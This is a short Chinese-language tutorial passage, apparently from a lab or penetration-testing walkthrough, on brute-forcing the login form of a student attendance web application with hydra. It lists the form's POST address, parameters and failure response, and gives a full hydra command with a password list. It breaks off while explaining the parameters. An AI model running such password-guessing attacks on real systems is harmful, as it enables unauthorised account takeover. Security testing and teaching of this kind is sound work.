使用hydra执行http表单暴力破解
通过浏览器自带分析得知:
提交地址:http://10.0.0.115/student_attendance/ajax.php?action=login
提交方式:POST
提交数据:username=a&password=a
服务响应:3
根据以上收集的信息就可以使用hydra进行密码爆破
hydra 10.0.0.115 http-form-post "/student_attendance/ajax.php?action=login:username=^USER^&password=^PASS^:\r\n\r\n3" -l admin -P MidPwds.txt -vV -f
参数说明
10.0.0.115 目标主机地址
http-form-post POST提交方